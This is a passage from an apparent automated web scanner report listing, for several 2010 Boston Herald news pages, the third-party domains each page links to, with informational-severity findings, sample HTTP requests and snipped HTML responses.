src="http://pixel.quantserve.com/pixel/p-352ZWwG8I7OVQ.gif" style="display:
none;" border="0" height="1" width="1" alt="Quantcast"/></a>
...[SNIP]...

8.31. http://bostonherald.com/news/politics/view.bg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/news/politics/view.bg

Issue detail

The page was loaded from a URL containing a query string:

http://bostonherald.com/news/politics/view.bg?articleid=1294589&position=0

The response contains the following links to other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder
http://b.scorecardresearch.com/b?c1=2&c2=6151562&c3=www.bostonherald.com&c4=www.bostonherald.com%2Fnews%2Fpolitics%2Fview.bg%3Farticleid%3D1294589&c5=&c6=&c15=
http://bostonherald.boocoo.com/
http://bostonheraldnie.newspaperdirect.com/
http://cache.heraldinteractive.com/images/siteImages/edge/edgeBlank.gif
http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png
http://cache.heraldinteractive.com/images/siteImages/icons/fontLarge.gif
http://cache.heraldinteractive.com/images/siteImages/icons/fontSmall.gif
http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniArticle.gif
http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniComments.gif
http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniEmail.gif
http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniPrint.gif
http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/facebook.png
http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/twitter.png
http://cache.heraldinteractive.com/images/siteImages/reporters/jessicaFargen.jpg
http://cache.heraldinteractive.com/images/version5.0/site_images/mlf.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/nie.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/nieSmart.gif
http://cache.heraldinteractive.com/js/ajax.js?nocache=1234
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js?1=21
http://cache.heraldinteractive.com/js/dropdown.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js?1=21
http://d.yimg.com/ds/badge2.js
http://edge.quantserve.com/quant.js
http://feeds.feedburner.com/bostonherald/news/politics/
http://hotjobs.yahoo.com/job-search;_ylc=X3oDMTFka204b2luBF9TAzM5NjUxMTI1MQRwYXJ0bmVyA2Jvc3RvbmhlcmFsZARzcmMDY29uc29sZQ--?partner=bostonherald&kw=bostonherald.com&locations=Boston%2C+MA&metro_search_proxy=1&metro_search=1&industry=
http://multimedia.heraldinteractive.com/images/20101104/stp/1536f2_Cahill_10022010.jpg
http://multimedia.heraldinteractive.com/images/20101106/stp/e9e879_barneyf_11072010.jpg
http://multimedia.heraldinteractive.com/images/20101107/fb307e_110610cahillfn03.JPG
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://pixel.quantserve.com/pixel/p-352ZWwG8I7OVQ.gif
http://s7.addthis.com/js/200/addthis_widget.js
http://twitter.com/bostonherald
http://widget.newsinc.com/_fw/bostonherald/toppicks_bostonherald_top.html
http://www.addthis.com/bookmark.php?v=20
http://www.bostonheraldineducation.com/
http://www.carfind.com/
http://www.facebook.com/pages/BostonHeraldcom/197211981599
http://www.heraldmedia.com/privacy.html
http://www.homefind.com/
http://www.legacy.com/obituaries/bostonherald/
http://www.massliteracy.org/
http://www.quantcast.com/p-352ZWwG8I7OVQ

Request

GET /news/politics/view.bg?articleid=1294589&position=0 HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=1.247838239.1289175481.1289175481.1289175481.1; __utmc=1; __utmb=1.3.10.1289175481; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 01:19:56 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 45858

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>



<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>


       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/b?c1=2&c2=6151562&c3=www.bostonherald.com&c4=www.bostonherald.com%2Fnews%2Fpolitics%2Fview.bg%3Farticleid%3D1294589&c5=&c6=&c15=" style="display:none" width="0" height="0" alt="" />
</noscript>
...[SNIP]...
<a href="/">
<img src="http://cache.heraldinteractive.com/images/siteImages/edge/edgeBlank.gif" class="headerLogoSpacer">
</a>
...[SNIP]...
<li id="obits" class="tab" onmouseover="this.className=this.className+'Hover'; return false;" onmouseout="this.className=this.className.replace('Hover',''); " onclick=""><a href="http://www.legacy.com/obituaries/bostonherald/">Obituaries</a>
...[SNIP]...
<a class="alt" href="javascript:void(0);">Features <img src="http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png" alt="Features">

<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>

<a href="http://www.addthis.com/bookmark.php?v=20" onmouseover="return addthis_open(this, '', '[URL]', 'Tim Cahill: Attacks ‘backfired’');" onmouseout="addthis_close();" onclick="return addthis_sendto();"><img class="line_icon" src="/images/siteImages/icons/share-icon-16x16.png" width="16" height="16" alt="Bookmark and Share" style="border:0"/>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
<a href="/news/politics/view.bg?articleid=1294589&format=comments#CommentsArea"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniComments.gif"
alt="Comments" />(228) Comments  |  Post / Read Comments</a>
...[SNIP]...
<div id="nextArticleTease" style="display:none">
<img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniArticle.gif"> <b>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
<div id="trackPhotoGalleryPicArea"><img id="trackMainImage" class="mainImage" src="http://multimedia.heraldinteractive.com/images/20101107/fb307e_110610cahillfn03.JPG" alt="Independent Tim Cahill, at home in..." /></div>
...[SNIP]...
<a href="/news/politics/view/20101107moneybags_menino/"><img src="http://multimedia.heraldinteractive.com/images/20101106/stp/e9e879_barneyf_11072010.jpg" alt="Moneybags Menino" /></a>
...[SNIP]...
<a href="/news/politics/view/20101104tim_cahill_former_aides_quietly_settle_sabotage_suit/"><img src="http://multimedia.heraldinteractive.com/images/20101104/stp/1536f2_Cahill_10022010.jpg" alt="Tim Cahill, former aides quietly settle sabotage suit" /></a>
...[SNIP]...

<iframe src="http://widget.newsinc.com/_fw/bostonherald/toppicks_bostonherald_top.html" height="225" width="300" scrolling="no" frameborder="0"/></iframe>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
<span style="bold"><a href="http://hotjobs.yahoo.com/job-search;_ylc=X3oDMTFka204b2luBF9TAzM5NjUxMTI1MQRwYXJ0bmVyA2Jvc3RvbmhlcmFsZARzcmMDY29uc29sZQ--?partner=bostonherald&kw=bostonherald.com&locations=Boston%2C+MA&metro_search_proxy=1&metro_search=1&industry=" target="_new">Jobs with Herald Media</a>
...[SNIP]...
<div style="padding:15px; text-align:center;">
<a href="http://www.bostonheraldineducation.com" target=_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/nie.gif" alt="N.I.E." /></a>
<a href="http://bostonheraldnie.newspaperdirect.com" target=_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/nieSmart.gif" alt="Smart Edition" /></a>
<a href="http://www.massliteracy.org" target=_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/mlf.gif" alt="Mass Literacy Foundation" /></a>
...[SNIP]...
<br />No portion of BostonHerald.com or its content may be reproduced without the owner's written permission. <a href="http://www.heraldmedia.com/privacy.html">Privacy Commitment</a>
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/b?c1=2&c2=6151562&c3=www.bostonherald.com&c4=www.bostonherald.com%2Fnews%2Fpolitics%2Fview.bg%3Farticleid%3D1294589&c5=&c6=&c15=" style="display:none" width="0" height="0" alt="" />
</noscript>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
<noscript>
<a href="http://www.quantcast.com/p-352ZWwG8I7OVQ" target="_blank"><img
src="http://pixel.quantserve.com/pixel/p-352ZWwG8I7OVQ.gif" style="display:
none;" border="0" height="1" width="1" alt="Quantcast"/></a>
...[SNIP]...

8.32. http://bostonherald.com/news/regional/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/news/regional/

Issue detail

The page was loaded from a URL containing a query string:

http://bostonherald.com/news/regional/?position=1

The response contains the following links to other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects
http://b.scorecardresearch.com/b?c1=2&c2=6151562&c3=www.bostonherald.com&c4=www.bostonherald.com%2Fnews%2Fregional%2F&c5=&c6=&c15=
http://bostonherald.boocoo.com/
http://cache.heraldinteractive.com/images/siteImages/edge/edgeBlank.gif
http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png
http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/facebook.png
http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/twitter.png
http://cache.heraldinteractive.com/images/siteImages/reporters/howie_carr.gif
http://cache.heraldinteractive.com/images/siteImages/reporters/margery_eagan.gif
http://cache.heraldinteractive.com/images/siteImages/slider/teases/policeBlotter177.gif
http://cache.heraldinteractive.com/images/siteImages/slider/teases/taxDollars177.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniGallery.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/tools_enews_small.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/tools_home_delivery_small.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/tools_mobile_small.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/tools_news_tips_small.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/tools_rss_small.gif
http://cache.heraldinteractive.com/js/ajax.js
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js
http://edge.quantserve.com/quant.js
http://feeds.feedburner.com/bostonherald/news/regional/
http://multimedia.heraldinteractive.com/images/20101106/stp/112682_home_11072010.jpg
http://multimedia.heraldinteractive.com/images/20101106/stp/33984b_marines_11072010.jpg
http://multimedia.heraldinteractive.com/images/20101106/stp/3b0ba2_church_11072010.jpg
http://multimedia.heraldinteractive.com/images/20101106/stp/4e2317_bridge_11072010.jpg
http://multimedia.heraldinteractive.com/images/20101106/stp/6fb9d3_limo_11072010.jpg
http://multimedia.heraldinteractive.com/images/20101106/stp/c228dd_waves_11072010.jpg
http://multimedia.heraldinteractive.com/images/20101107/stp/9580bd_fad874_Bella_05092010.jpg
http://multimedia.heraldinteractive.com/images/20101107/stp/dd62fa_dubois.jpg
http://multimedia.heraldinteractive.com/images/20101107/stp/fb307e_110610cahillfn03.JPG
http://pixel.quantserve.com/pixel/p-352ZWwG8I7OVQ.gif
http://twitter.com/bostonherald
http://widget.newsinc.com/_fw/bostonherald/toppicks_bostonherald_top.html
http://www.carfind.com/
http://www.collegeanduniversity.net/herald/
http://www.facebook.com/pages/BostonHeraldcom/197211981599
http://www.facebook.com/plugins/activity.php?site=http%253A%252F%252Fbostonherald.com&width=300&height=300&header=true&colorscheme=light&font&border_color
http://www.heraldmedia.com/privacy.html
http://www.homefind.com/
http://www.legacy.com/obituaries/bostonherald/
http://www.quantcast.com/p-352ZWwG8I7OVQ
http://www.uclick.com/client/boh/sudoc/

Request

GET /news/regional/?position=1 HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=1.247838239.1289175481.1289175481.1289175481.1; __utmc=1; __utmb=1.3.10.1289175481; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 01:11:02 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 59753

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>



   <link rel="alternate" title="Local Coverage - News & Opinion - BostonHerald.com" href="http://feeds.feedburner.com/bostonherald/news/regional/" type="application/rss+xml">
<script type="text/javascript" language="JavaScript">
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/b?c1=2&c2=6151562&c3=www.bostonherald.com&c4=www.bostonherald.com%2Fnews%2Fregional%2F&c5=&c6=&c15=" style="display:none" width="0" height="0" alt="" />
</noscript>
...[SNIP]...
<a href="/"><img src="http://cache.heraldinteractive.com/images/siteImages/edge/edgeBlank.gif" class="headerLogoSpacer"></a>
...[SNIP]...
<li id="obits" class="tab" onmouseover="this.className=this.className+'Hover'; return false;" onmouseout="this.className=this.className.replace('Hover',''); " onclick=""><a href="http://www.legacy.com/obituaries/bostonherald/">Obituaries</a>
...[SNIP]...
<a class="alt" href="javascript:void(0);">Features <img src="http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png" alt="Features"><!--[if gt IE 6]>
...[SNIP]...
<a class="alt" href="javascript:void(0);">Classifieds <img src="http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png" alt="Classifieds"><!--[if gt IE 6]>
...[SNIP]...
<div><a href="http://bostonherald.boocoo.com/">Boocoo Auctions</a>
...[SNIP]...
<div><a href="http://www.homefind.com">Homefind</a>
...[SNIP]...
<div><a href="http://www.carfind.com">Carfind</a>
...[SNIP]...
<li class="SubNavMain"><a href="http://www.legacy.com/obituaries/bostonherald/">Obituaries </a>
...[SNIP]...
<div id="followUs" class="dateBarItem">

<a href="http://www.facebook.com/pages/BostonHeraldcom/197211981599" style="font-weight:bold" target="_blank">Follow Us</a>

<a href="http://www.facebook.com/pages/BostonHeraldcom/197211981599" target="_blank">
<img class="icon" src="http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/facebook.png" />
</a>

<a href="http://twitter.com/bostonherald" target="_blank">
<img class="icon" src="http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/twitter.png" />
</a>
...[SNIP]...
<p>
<img src="http://cache.heraldinteractive.com/images/version5.0/site_images/tools_rss_small.gif"> <a class="orange" style="font-weight:bold" href="/rss">
...[SNIP]...
<p>
<img src="http://cache.heraldinteractive.com/images/version5.0/site_images/tools_enews_small.gif"> <a class="orange" style="font-weight:bold" href="/users/register/">
...[SNIP]...
<p>
<img src="http://cache.heraldinteractive.com/images/version5.0/site_images/tools_mobile_small.gif"> <a class="orange" style="font-weight:bold" href="/mobile/info.bg">
...[SNIP]...
<p>
<img src="http://cache.heraldinteractive.com/images/version5.0/site_images/tools_news_tips_small.gif"> <a class="orange" style="font-weight:bold" href="/about/contact/news_tip.bg">
...[SNIP]...
<p>
<img src="http://cache.heraldinteractive.com/images/version5.0/site_images/tools_home_delivery_small.gif"> <a class="orange" style="font-weight:bold" href="/about/home_delivery/">
...[SNIP]...
<a href="/news/regional/view/20101107real-life_wedding_crasher_limo_bandit_takes_something_borrowed_to_new_level/"><img src="http://multimedia.heraldinteractive.com/images/20101106/stp/6fb9d3_limo_11072010.jpg" alt="GET THEM TO THE CHURCH ON TIME: A Boston police officer conducts his investigation and speaks to bridesmaids whose limo was carjacked outside the wedding couple’s Dorchester church."></a>
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniGallery.gif" alt="Comments"><a href="/news/regional/view/20101107real-life_wedding_crasher_limo_bandit_takes_something_borrowed_to_new_level/srvc=loc&position=">
...[SNIP]...
<a href="/news/regional/view/20101107church-sale_plan_causes_beef/"><img src="http://multimedia.heraldinteractive.com/images/20101106/stp/3b0ba2_church_11072010.jpg" alt="DEFENDER: Kay Herlihy, vice chairman of the Haverhill Historical Commission, stands in front of St. Gregory the Illuminator Armenian Apostolic Church, which the group does not want converted into a Burger King."></a>
...[SNIP]...
<a href="/news/regional/view/20101107bridge_work_hits_ducks_dinosaurs/"><img src="http://multimedia.heraldinteractive.com/images/20101106/stp/4e2317_bridge_11072010.jpg" alt="SEEK ALTERNATE ROUTE: Police officers redirect traffic at the site of construction on the Craigie Drawbridge near the Museum of Science. The museum reported a slight decrease in visitors."></a>
...[SNIP]...
<a href="/news/regional/view/20101107moving_day_for_hope_homeowners/"><img src="http://multimedia.heraldinteractive.com/images/20101106/stp/112682_home_11072010.jpg" alt="AMERICAN DREAM: Ammanuel and Senait Tesfamriam pose with their children Filimon, 6, and Hermela, 11, inside their new home on Eustis Street."></a>
...[SNIP]...
<a href="/news/regional/view/20101107big_homecoming_planned_for_nh_girl_who_lost_limbs/"><img src="http://multimedia.heraldinteractive.com/images/20101107/stp/9580bd_fad874_Bella_05092010.jpg" alt="Bella Tucker, seen in healthier times, lost all four of her limbs due to illness. "></a>
...[SNIP]...
<a href="/news/regional/view/20101107hub_marine_earns_bronze_star_for_afghan_work/"><img src="http://multimedia.heraldinteractive.com/images/20101106/stp/33984b_marines_11072010.jpg" alt="FOR HIS SERVICE: Brig. Gen. James Lariviere pins a Bronze Star on Lt. Col. Paul Brickley."></a>
...[SNIP]...
<a href="/news/regional/view/20101107great_barrington_makes_peace_with_controversial_native_son_web_du_bois/"><img src="http://multimedia.heraldinteractive.com/images/20101107/stp/dd62fa_dubois.jpg" alt="In this Nov. 2, 2010 photo, a mural in downtown Great Barrington, honors the African American scholar W.E.B Du Bois, who was raised there. "></a>
...[SNIP]...
<a href="/news/regional/view/20101107all-time_high_tides/"><img src="http://multimedia.heraldinteractive.com/images/20101106/stp/c228dd_waves_11072010.jpg" alt=""></a>
...[SNIP]...
<a href="/news/politics/view.bg?articleid=1294589"><img src="http://multimedia.heraldinteractive.com/images/20101107/stp/fb307e_110610cahillfn03.JPG" alt="Local Politics" /></a>
...[SNIP]...
</div>

<iframe style="position: relative; margin-bottom: 16px;" src="http://widget.newsinc.com/_fw/bostonherald/toppicks_bostonherald_top.html" height="225" width="300" scrolling="no" frameborder="0"/></iframe>
...[SNIP]...
</h1>
                    <img style="width:50px; height:50px; padding:5px; background-color:#ddd; border:none" src="http://cache.heraldinteractive.com/images/siteImages/reporters/howie_carr.gif" alt="Howie Carr" />
                <div class="byline">
...[SNIP]...
</h1>
                    <img style="width:50px; height:50px; padding:5px; background-color:#ddd; border:none" src="http://cache.heraldinteractive.com/images/siteImages/reporters/margery_eagan.gif" alt="Margery Eagan" />
                <div class="byline">
...[SNIP]...
<div style="margin:0 0 20px 0; line-height:16px; width:310px">
<img style="float:left; margin:0 5px 0 0; clear:both" src="http://cache.heraldinteractive.com/images/siteImages/slider/teases/taxDollars177.gif">
<span class="bold">
...[SNIP]...
<a href="/news/police_logs/">
<img style="float:left; margin:2px 5px 0 0; clear:both" src="http://cache.heraldinteractive.com/images/siteImages/slider/teases/policeBlotter177.gif" alt="Boston Police Blotter" >
<div style="overflow:hidden; height:57px; max-height:57px">
...[SNIP]...
<div style="display:none;">
<iframe src="http://www.facebook.com/plugins/activity.php?site=http%253A%252F%252Fbostonherald.com&width=300&height=300&header=true&colorscheme=light&font&border_color" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:300px; height:300px;" allowTransparency="true"></iframe>
...[SNIP]...
<h2><a href="http://www.carfind.com/">Carfind</a>
...[SNIP]...
<h2><a href="http://www.homefind.com/">Homefind</a>
...[SNIP]...
<h2><a href="http://www.collegeanduniversity.net/herald/">Education Channel</a>
...[SNIP]...
<h2><a href="http://www.uclick.com/client/boh/sudoc/" target="_new">Play Sudoku!</a>
...[SNIP]...
<br/>
        No portion of BostonHerald.com or its content may be reproduced without the owner's written permission. <a href="http://www.heraldmedia.com/privacy.html">Privacy Commitment</a>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
<noscript>
<a href="http://www.quantcast.com/p-352ZWwG8I7OVQ" target="_blank"><img
src="http://pixel.quantserve.com/pixel/p-352ZWwG8I7OVQ.gif" style="display:
none;" border="0" height="1" width="1" alt="Quantcast"/></a>
...[SNIP]...

8.33. http://bostonherald.com/news/regional/view.bg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/news/regional/view.bg

Issue detail

The page was loaded from a URL containing a query string:

http://bostonherald.com/news/regional/view.bg?articleid=1294599&format=comments&srvc=news&position=2

The response contains the following links to other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder
http://b.scorecardresearch.com/b?c1=2&c2=6151562&c3=www.bostonherald.com&c4=www.bostonherald.com%2Fnews%2Fregional%2Fview.bg%3Farticleid%3D1294599%26format%3Dcomments%26srvc%3Dnews%26position%3D2&c5=&c6=&c15=
http://bostonherald.boocoo.com/
http://bostonheraldnie.newspaperdirect.com/
http://cache.heraldinteractive.com/images/siteImages/edge/edgeBlank.gif
http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png
http://cache.heraldinteractive.com/images/siteImages/icons/comments_reply.png
http://cache.heraldinteractive.com/images/siteImages/icons/fontLarge.gif
http://cache.heraldinteractive.com/images/siteImages/icons/fontSmall.gif
http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniAbuse.gif
http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniArticle.gif
http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniComments.gif
http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniEmail.gif
http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniPrint.gif
http://cache.heraldinteractive.com/images/siteImages/icons/page_white_link.png
http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/facebook.png
http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/twitter.png
http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_down_w_16.png
http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_down_w_f2_16.png
http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_up_w_16.png
http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_up_w_f2_16.png
http://cache.heraldinteractive.com/images/version5.0/site_images/mlf.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/nie.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/nieSmart.gif
http://cache.heraldinteractive.com/js/ajax.js?nocache=1234
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js?1=21
http://cache.heraldinteractive.com/js/dropdown.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js?1=21
http://d.yimg.com/ds/badge2.js
http://edge.quantserve.com/quant.js
http://feeds.feedburner.com/bostonherald/news/regional/
http://hotjobs.yahoo.com/job-search;_ylc=X3oDMTFka204b2luBF9TAzM5NjUxMTI1MQRwYXJ0bmVyA2Jvc3RvbmhlcmFsZARzcmMDY29uc29sZQ--?partner=bostonherald&kw=bostonherald.com&locations=Boston%2C+MA&metro_search_proxy=1&metro_search=1&industry=
http://multimedia.heraldinteractive.com/images/20101106/3b0ba2_church_11072010.jpg
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://pixel.quantserve.com/pixel/p-352ZWwG8I7OVQ.gif
http://s7.addthis.com/js/200/addthis_widget.js
http://twitter.com/bostonherald
http://widget.newsinc.com/_fw/bostonherald/toppicks_bostonherald_top.html
http://www.addthis.com/bookmark.php?v=20
http://www.bostonheraldineducation.com/
http://www.carfind.com/
http://www.facebook.com/pages/BostonHeraldcom/197211981599
http://www.heraldmedia.com/privacy.html
http://www.homefind.com/
http://www.legacy.com/obituaries/bostonherald/
http://www.massliteracy.org/
http://www.quantcast.com/p-352ZWwG8I7OVQ

Request

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 01:14:30 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-language: en
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 80125

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>



<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>


       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/b?c1=2&c2=6151562&c3=www.bostonherald.com&c4=www.bostonherald.com%2Fnews%2Fregional%2Fview.bg%3Farticleid%3D1294599%26format%3Dcomments%26srvc%3Dnews%26position%3D2&c5=&c6=&c15=" style="display:none" width="0" height="0" alt="" />
</noscript>
...[SNIP]...
<a href="/">
<img src="http://cache.heraldinteractive.com/images/siteImages/edge/edgeBlank.gif" class="headerLogoSpacer">
</a>
...[SNIP]...
<li id="obits" class="tab" onmouseover="this.className=this.className+'Hover'; return false;" onmouseout="this.className=this.className.replace('Hover',''); " onclick=""><a href="http://www.legacy.com/obituaries/bostonherald/">Obituaries</a>
...[SNIP]...
<a class="alt" href="javascript:void(0);">Features <img src="http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png" alt="Features">

<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>

<a href="http://www.addthis.com/bookmark.php?v=20" onmouseover="return addthis_open(this, '', '[URL]', 'Church-sale plan causes beef');" onmouseout="addthis_close();" onclick="return addthis_sendto();"><img class="line_icon" src="/images/siteImages/icons/share-icon-16x16.png" width="16" height="16" alt="Bookmark and Share" style="border:0"/>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...

